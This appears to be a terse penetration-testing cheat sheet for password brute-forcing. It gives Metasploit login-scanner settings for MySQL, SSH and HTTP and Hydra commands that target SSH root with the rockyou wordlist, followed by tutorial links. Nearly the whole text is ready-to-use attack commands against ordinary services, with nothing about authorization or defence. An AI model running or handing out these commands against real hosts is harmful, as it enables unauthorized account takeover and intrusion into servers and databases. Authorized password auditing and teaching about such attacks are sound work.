BRUTE-FORCE AND DICTIONARY ATTACK

assuming you got some dictionaries ready already

BRUTALIZE MYSQL/MARIADB

use scanner/mysql/mysql_login
set PASS_FILE /usr/share/wordlists/rockyou.txt
set USER_FILE /usr/share/wordlists/users.txt
set RHOSTS x.x.x.x

#set USERNAME root
set STOP_ON_SUCCESS true
set BLANK_PASSWORDS true
run

BRUTALIZE SSH

assuming password-based auth for once

ideally you got a user name or user DB target. this is just example against root

with MSF

use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS x.x.x.x
set STOP_ON_SUCCESS true
set THREADS 100
set USERNAME root
set PASS_FILE /var/tmp/rockyou.txt
run

–or– with Hydra

apt install hydra
hydra -t 4 -l root -P /var/tmp/rockyou.txt ssh://$target
#hydra -L usernames.txt -p password  192.168.1.1 http-get / -s 80

BRUTALIZE HTTP

use auxiliary/scanner/http/http_login
set AUTH_URI /share/
set BLANK_PASSWORDS true
...
set VERBOSE false
run

RESOURCES

Metasploit - Brute-Force Attacks https://www.tutorialspoint.com/metasploit/metasploit_brute_force_attacks.htm

Bruteforce MySQL Using Metasploit… https://0xzoidberg.wordpress.com/2010/07/03/bruteforce-mysql-using-metasploit/

Cracking Network Passwords (Hydra) https://netsec.ws/?p=353


GUIDES | LECTURES | BENCHMARKS | SMTP HEALTH